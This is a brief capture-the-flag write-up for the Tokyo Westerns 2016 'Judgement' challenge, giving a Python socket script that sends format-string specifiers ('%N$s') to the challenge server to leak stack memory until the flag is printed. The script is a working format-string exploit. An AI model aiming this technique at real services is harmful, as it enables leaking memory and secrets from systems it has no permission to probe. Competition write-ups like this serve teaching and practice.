Tokyo Westerns 2016 - Judgement

#CTF #Python #Sockets #Binary_Exploitation

Tokyo Westerns 2016 was this past weekend and one of the challenges (Judgement.bin) had you connect to a remote listener and send it something. It was vuln to string format so we could leak the stack. Printing the stack:

#!/usr/bin/env python

import socket

for i in range(50):
  csock = socket.socket()
  csock.connect(('pwn1.chal.ctf.westerns.tokyo', 31729))
  csock.send("%{}$s\n".format(i))
  x = csock.recv(1024)
  if 'TWCTF' in x:
    print(x)
    break

After a bit, we are rewarded with Input flag >> TWCTF{R3:l1f3_1n_4_pwn_w0rld_fr0m_z3r0}